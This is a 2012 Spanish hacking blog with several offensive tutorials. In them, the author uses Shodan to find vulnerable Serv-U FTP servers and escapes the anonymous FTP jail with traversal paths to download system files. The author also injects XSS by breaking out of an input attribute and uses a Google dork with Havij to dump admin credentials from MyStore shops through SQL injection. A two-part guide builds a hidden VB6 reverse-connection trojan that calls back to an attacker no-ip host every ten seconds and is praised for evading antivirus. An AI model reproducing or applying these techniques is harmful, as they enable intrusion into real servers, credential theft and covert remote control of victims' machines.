martes, 31 de enero de 2012

Serv-U FTP Jail Break, escalando directorios


Esta vulnerabilidad está afectada por las siguientes versiones 6.4, 7.1, 7.3, 8.2, 10.5 que tengan anonymous login habilitado . Para explotarla lo único que necesitaremos es nuestra consola y shodan (http://www.shodanhq.com/).

Empezaremos por buscar una víctima. Para eso utilizaremos el ya mencionado shodan, nuestro segundo dios, después de google claro :)

Ponemos serv-u 7.3 port:21

Después de pasar unas cuantas páginas con servidores serv-u 7.3, encuentro una que tiene anonymous login.




Os fijáis que en la mayoría pone Sorry, no ANONYMOUS acces allowed. Pero encontramos una que pone User logged in, proceed, nos deja pasar poniendo simplemente anonymous.

Así que lo primero que hago es hacer un ping al host para ver si esta en funcionamiento. Esto es simple de hacer, abrimos el cmd, y ponemos ping y la url o la ip del host.







Por lo visto no se nos conecta el server esta fuera de servicio, una pena, tenia buena pinta :( , seguiremos buscando, recordad que podemos poner cualquier versión del serv-u vulnerable, tenemos muchas opciones de búsqueda.

Después de un par de intentos tenemos uno!

Nos conectamos via ftp

Ponemos ftp le damos a intro.


y después open y la ip o el host que tengamos.



Ahora en Usuario pondremos anonymous y de pass un correo inventado ---> holaquetal@hacked.com


Ahora ya podemos introducir comandos, pondremos dir. Y vemos que solo hay un archivo que se llama readme.txt




Probamos a poner cd.. para cambiar de directorio. Pero vemos que no nos deja!!







Nos pone comando no valido. Ahora es cuando entra en juego nuestra vulnerabilidad. Pondremos cd "/..:/..:/..:/..:/program files"
y veremos que nos cambia de directorio, MAGIA!!



Ahora pondremos el comando dir para ver que tiene el program files:






NO podemos!!! no tenemos permiso, como le podemos solventar?
Muy sencillo poniendo   dir "/..:/..:/..:/..:/program files"

 
Supongo que ahora entenderéis como funciona esto, por ejemplo si queremos descargar un archivo pondremos get "..:/..:/..:/..:/windows/system32/calc.exe"
Nos descargaremos su calculadora (un poco tonto pero de ejemplo va bien XD )

Si queréis mas info de la vulnerabilidad la podéis encontrar en:



Salu2 anónimo!



Desafío 2 de XSS!!!

Ya tengo lista la segunda prueba de nuestro servidor de prácticas.
En esta consistirá en conseguir introducir, al igual que en el primer desafío, un <script>alert('hacked')</script> , pero esta vez no hay campos de texto, ni formularios, ni nada donde escribir.

pista: Seguramente tendrás que usar el siguiente addon para firefox:


https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/ 

link del desafío: http://pruebapp.comyr.com/vuln2.html 



Suerte a todos, y recordad que cuando lo tengáis publicar la solución!!!

lunes, 30 de enero de 2012

Servidor de practicas hacking!!!

He decidido montar un server para las practicas que realicemos o para que practiquéis vosotros, además de retos. Después del post de html injection por la url en un buscador, aquí va un desafió que os propongo:

Tendréis que conseguir poner una imagen y un cuadro de alerta que ponga hackeado. Cuando tengáis la solución ponerla en un comentario para ver si es correcta. Recordad que nada es imposible y se puede conseguir introducir código en la web solo tenéis que fijaros bien.


link de la página donde pondré las prácticas: 

http://pruebapp.comyr.com/ 

link del desafió:

http://pruebapp.comyr.com/vuln1.html


Suerte!!! y saludos anónimo.

domingo, 29 de enero de 2012

Ataque a la URL del server, inyección html

Esto no se puede llamar ataque del todo, lo máximo que podemos conseguir es las cookies de la víctima, pero eso ya os lo enseñaré otro día, hoy utilizaremos esta técnica tan rematadamente simple y poco dañina, únicamente para reírnos un rato. Aquí va un ejemplo de lo que digo:





Bien esto es simple de hacer aunque hay que fijarse en el código html. 

Por ejemplo tenemos una página, con un buscador. Cuando ponemos hola, nos salen todos los resultados acordes a hola, pero si no nos sale ningún resultado, nos pondrá seguramente:

no se ha encontrado ningún resultado de hola.

Si somos un poco mas inteligentes podremos observar que lo que pongamos saldrá en la pagina, me explico:

si pusiéramos hola2 no pondría:

no se ha encontrado ningún resultado de hola2.

Ahora nos fijamos en la URL y pone index.php?buscartexto=hola2
También nos aparece en la URL!!

Pensemos un poco y si pusiéramos un código html dentro?, saldría en la página?

Probemos:

Vamos a poner <script>alert('hacked')</script> .
Si nos saltara el script, funcionaria y podríamos insertar imágenes y lo que queramos.

Pero imaginemos que no nos salta el script. Que ha pasado? 
Miramos el html:

<input type="hidden" name="buscartexto" value="<script>alert('hacked')</script>" />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />

Vemos que el script se ha quedado dentro de las comillas de value. Como podemos salir de ahí? 

Es muy simple si ponemos delante de todo "/> sera como la parte final del imput. Quedaria así:
<input type="hidden" name="buscartexto" value=""/><script>alert('hacked')</script>" />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />

Ahora estaríamos fuera del input. Y se ejecutaría el script como una parte mas del código. /> quedaría fuera y formaría parte solo del texto.

Aquí un ejemplo:


La URL se nos quedaría así y ya se lo podríamos mandar a quien quisiéramos!!!


Salu2 anónimo!

















 

sábado, 28 de enero de 2012

TUTORIAL TROYANO EN VB 6 PARTE 2:

Como ya dije hoy publico la parte dos de nuestro troyano en visual basic. En la anterior vimos como funcionan los troyanos de conexión inversa y creamos un cliente para conectarnos a la víctima. En esta segunda parte veremos como crear el server.

Lo primero abrimos visual basic y creamos un nuevo proyecto o si ya lo tenemos lo abrimos. Añadimos el control winsock, esto ya os enseñe a hacerlo en el anterior tutorial. Y también añadimos un nuevo elemento que no habíamos visto antes, un timer, en la barra de herramientas es el icono que es un reloj.


Bien ahora que ya tenemos todo listo podemos empezar a trabajar.
Damos doble click sobre el programa y nos aparecerá el editor de texto. Nos tendrá que aparecer el siguiente código el cual ya vimos. Si no aparece lo añadimos.


Private Sub Form_Load()

end sub

Como ya sabéis esto indica que todo lo que se ponga entre estas dos lineas se ejecutara al empezar el programa. Así que ponemos entre las dos:

 
Private Sub Form_Load()

Me.Hide
end sub
Me.Hide sirve para ocultar el programa así cuando la víctima lo ejecute no sabrá que se esta ejecutando, simplemente no lo verá, a no ser que ejecute el administrador de tareas, pero mas adelante veremos como solventar el problema del administrador de tareas, así quedará bien oculto.

Ahora tendremos que configurar el timer. Para volver al editor visual le damos doble click a form1, donde pone Project-Project1, arriba a la izquierda. Ahora le damos solamente un click al timer que hemos agregado antes. Miramos donde pone Properties Timer 1, abajo a la derecha. Y donde pone interval  pondremos 10000 , esto equivale a 10 segundos 10000 ms.

Damos doble click en el timer y nos volverá a aparecer el editor de código. Pondrá:

Private Sub Timer1_Timer()

End Sub








Esto significa que el programa realizara la acción que introduciremos entre las dos lineas cada intervalo de tiempo, en nuestro caso 10 segundos.

Entre estas dos lineas irá una parte muy importante del código, la que se conecta al cliente.

Private Sub Timer1_Timer()
 
winsock1.close

winsock1.connect "aqui pon tu no-ip" ,aquí pon el puerto que has abierto 
 
End Sub




Ejemplo:



Private Sub Timer1_Timer()
 
winsock1.close

winsock1.connect "pedrito.zapto.org" ,4433 a
 
End Sub



Así se nos conectara cada nuestro cliente cada 10 segundos.


Ya tenemos finalizado el troyano. Para probarlo, tendremos que abrir el cliente y darle al botón de listen, así se nos quedara en modo escucha. Entonces abrimos el server que acabamos de crear. Y en el label del cliente que pusimos nos saldrá conectado!! Si no funcionara, tendríais que mirar si los puertos están bien configurados, si tenéis abierto el no-ip o si os salta algún error en el programa, aunque no creo. Por supuesto este troyano es inútil no tiene ninguna función, ninguna broma ni keylogger ni nada, solo nos sale cuando está conectado, así que en los próximos tutoriales, enseñaré a poner mas funciones al troyano. Una cosa importante que no se si os habéis fijado es que no lo detecta el antivirus, esto es porque ningún antivirus conoce la existencia de este troyano ya que lo hemos creado nosotros y solo nosotros, alguna ventaja tendrá hacer un troyano uno mismo no? Aquí os dejo un resumen del código utilizado, aunque es mas bien poco:


Private Sub Form_Load()

Me.Hide

end sub


Private Sub Timer1_Timer()
 
winsock1.close

winsock1.connect "aquí pon tu no-ip" ,aquí pon el puerto que has abierto 
 
End Sub






Salu2 anónimo 





viernes, 27 de enero de 2012

MyStore Tienda Virtual SQL Injection Vulnerability, usando havij

Info de la vulnerabilidad:  

http://www.exploit-db.com/exploits/18306/

Bueno después de haberos presentado havij vamos a ponerlo en práctica con una vulnerabilidad en la tienda virtual MyStore. 

google dork: inurl:art_catalogo.php?id=

Simplemente introduciendo inurl:art_catalogo.php?id= en google tenemos una

pequeña lista  de páginas con esta vulnerabilidad. Para comprobar que es vulnerable pondremos una ' despues del = .Así -->  art_catalogo.php?id=' .Si nos salta un error es vulnerable:



 


Ahora sustituimos /art_catalogo.php?id=693&ida=683 por /art_catalogo.php?id=' 
Hemos puesto una ' en 693&ida=683 . Y nos saltará un error MySQL.


Si nos salta el error podremos empezar ha hacer la sqli. Es bastante costoso hacerla pero recordad que tenemos una gran herramienta que trabaja por nosotros ;). 

Ahora abriremos el havij, introduciremos la url en la que nos ha saltado el error y le daremos a Analyze. Una vez acabe de finalizar el proceso, le daremos a la pestaña de tables y le daremos en get table. Seleccionaremos las tablas que queremos ver y le damos a get columns por último seleccionamos las columnas que queremos ver y le damos a get data para ver la información que contienen.

 


Despues de esta imágen acabais de ver el gran potencial de esta vulnerabilidad. Nos da el user del administrador y su contraseña :) (el password esta en MD5, asi que necesitaremos un MD5 crack para cescifrarlo, pero esto ya nos lo da el havij en la pestaña que pone MD5) Al largo del blog iré añadiendo mas Dorks y servidores vulnerables a sqli y otras vulnerabilidades web!! 

Salu2 anonimo



 

 


SHODAN computer search.

Hoy os presento el SHODAN computer search, ya que lo utilizaremos mucho a lo largo del blog. Es simplemente un buscador de servidores remotos. Pondré un ejemplo: si ha salido una nueva vulnerabilidad en el apache 2.5 y tenemos un exploit simplemente poniendo en el SHODAN apache 2.5 nos saldrán todos los servidores con esta versión del apache, os podéis hacer una idea de el potencial de esto. También podemos buscar servidores con un puerto especifico, por ejemplo el 21 ftp y buscar algun servidor vulnerable o buscar país de procedencia del server. Os aconsejo que os registreis para acceder a todas las funciones, aunque algunas son de pago.


link de la página: http://www.shodanhq.com/

jueves, 26 de enero de 2012

Sqli automatizado!!!


En la red no se habla mucho del siguiente programa que os voy a mostrar, pero tiene un potencial increible. Aqui esta:

http://www.mediafire.com/?5w200a8ccnl540c

imagen del programa:





Es un programa sensacional, y trabaja perfectamente, es capaz de sacar todas las tablas columnas de datos etc. Y en solo un par de minutos!! Lo unico que debemos insertar es la url maliciosa de la página. Y listo, ya tenemos toda su base de datos. A parte de sqli tambien tiene "find admin" y "MD5 crack".

Para los que aun no sepan que es una SQL injection aquí les dejo un tutorial (recordad que lo muestra en el siguiente tutorial lo hace Havij de manera automatica):

http://foro.cibernodo.net/tema-tutorial-sqli
Black March, El Marzo Negro.

Como propuesta para protestar sobre el cierre de megaupload y la ley de SOPA, anonymous ha decidido crear el 'Black March' o 'Marzo Negro'. Consiste en que durante el mes de marzo no se compre ningun articulo de musica no se vaya al cine, ni se compre ninguna pelicula, etc. A fin de dejar un gran agujero en los beneficios de las grandes empresas y discograficas. Unete al marzo negro!!!

Por si no sabeis que es la ley de SOPA aquí os dejo un video explicativo:

 Salu2 anonimo

miércoles, 25 de enero de 2012

TUTORIAL TROYANO EN VISUAL BASIC 6:

Lo primero por supuesto necesitareis el visual basic 6, para los que no lo tengais aquí os dejo un link, para su descargar (está en versión portable, genera .exe peso-4.57 mb) :

http://www.mediafire.com/?jo546wd8j63e26x

Bueno una vez tengamos el visual basic instalada ya estaremos a punto para poder trabajar.

Como en cualquier troyano de conexión inversa necesitaremos un no-ip y abrir puertos en el router. Parece un porceso complicado pero es bastante facil. Como hay mucha info en internet sobre crear un no-ip y abrir puertos aqui os dejo dos links de dos tutoriles para saber como hacerlo:

Tutorial no-ip:

http://www.gizlayer.com/threads/guia-como-crear-un-no-ip.129455/


Tutorial apertura de puertos del router:

http://www.adslzone.net/tutorial-37.2.html 


Una vez ya esté todo listo podemos comenzar a trabajar con nuestro troyano:


1-Abrimos el visual basic 6 portable:


 Le damos a Sandard EXE y comenzaremos un nuevo proyecto:

 
Este sera nuestro cliente ahora crearemos otra vez otro proyecto que sera nuestro server.


Los troyanos tienen dos programas el server, que es lo que se manda a la victima para infectarla y el cliente, que es el programa que utilizamos para conectarnos a la victima. En los troyanos de conexión inversa es la victima la que se conecta a nosotros, una vez se realiza la conexión, tendremos control total sobre ella.


Bueno, despues de esta aclaración necesaria. Es hora de agregar nuestro primer componente. Es el componente mas importante de todos, sin el es imposible realizar la conexión. Es el winsock en la barra de herramientas (a la derecha del programa) no aparece, por lo tanto tendremos que agregarlo:


-Le damos a project


-Vamos a components


-Y buscamos microsoft winsock control 6.0, lo marcamos y le damos a aceptar.






Al agregarlo, nos fijamos que aparece el icono en la barra de herramientas, le damos doble click para agregarlo al programa.



Ya tenemos listo el winsock, tendremos que agregarlo tanto en el cliente como en el servidor.

Solo nos queda una cosa antes de comenzar a programas, necesitamos poner un botón en el cliente y un label. Este botón nos servirá para poner a la escucha nuestro cliente, despues aclarare lo que es poner a la escucha.

Para agregarlo doble click sobre CommandoButon en la barra de tareas.


Donde pone Properties-Command1 (a la izquierda)Buscamos en la lista caption, veremos que pone Command1, esto podemos cambiarlo para cambiar el texto del boton. De caption le pondremos listen.

Para agregar el label le damos doble click en la barra de herramientas, es el icono que tiene una A.

Para cambiar el texto es igual, vamos a caption y lo cambiamos por Estado: .

Nos quedará así:





Ya está todo listo, podemos empezar a programar:

Empezaremos con el cliente (donde hemos agragado el botón y el label) .Le damos doble click sobre el boton que hemos agregado al programa. Veremos un espacio en blanco con el siguiente texto:


Private Sub Command1_Click()

End Sub



¿Que quiere decir esto?  Que todo lo que pongamos entre estas dos frases se realizara cuando demos click al botón, simple verdad?, por que creeis que se llama basic? xd

Bien ahora viene una parte fundamental, ponemos lo siguiente entre estas dos frases:

Private Sub Command1_Click()
Winsock1.Close
Winsock1.Listen
End Sub

Winsock1.close significa que se cierra el winsock1 y winsock1.listen es para poner el winsock1 en modo escucha.Estas acciones ocurren cuando se pulsa el botón


Porque queremos que se cierre winsock1?


Porque si no se cerrara, al darle al botón se pondria en modo escucha y si le dieramos otra vez saltaria un error porque ya estava en modo escucha probarlo si quereis.

Ya tenemos en winsock1 escuchando conexiones, ahora vamos a indicarle que puerto quiere que escuche.


Private Sub Form_Load()
winsock1.localport = el puerto que has abierto en el router
winsock1.remoteport = el puerto que has abierto en el router
End Sub

Esto quiere decir que cuando el programa se cargar ponga como localport el puerto que quieras y como remoteport el puerto que quieras

Solo nos queda una última cosa para el cliente. 

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept (requestID)
Label1.Caption = "conectado!!"
End Sub

Esto significa que cuando nos llege una petición para que alguien se conecte a nosotros la acceptemos (winsock1.accept(requestID)) Y cuando se conecte nos saldra en el label conectado!!  

Doy por concluida la primera parte de este tutorial, en el siguiente veremos la parte del server, aquí os dejo un resumen del código utilizado:

Private Sub Command1_Click()
Winsock1.Close
Winsock1.Listen
End Sub

Private Sub Form_Load()
Winsock1.LocalPort = 2424    'aquí poner el puerto que abristeis
Winsock1.RemotePort = 2424  'aquí poner el puerto que abristeis
End Sub


Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept (requestID)
Label1.Caption = "conectado!!"
End Sub












 
C0M3NZ4MOS ALGO MAS QUE HACKING :

El conocimiento ha de ser libre, esta frase me hizo reflexionar mucho cuando la escuche, por ello he decidido crear este blog a fin de aportar mi grano de arena a internet, quiero dejar claro que mis conocimientos no son nada igualables a los de un hacker de verdad. La finalidad de este blog es que aprendais los pocos conocimientos que he adquerido. Intentare tocar todos los temas posibles, de una manera facil y sencilla, programacion, exploits, backtrack, noticias sobre hacking, y mas cosas, cada cosa que aprenda y considere interesante la publicare. Creo que no hay nada mas que decir asi que comenzare, con un tutorial para crear un troyano de conexión inversa en visual basic 6 . 

Salu2 anónimo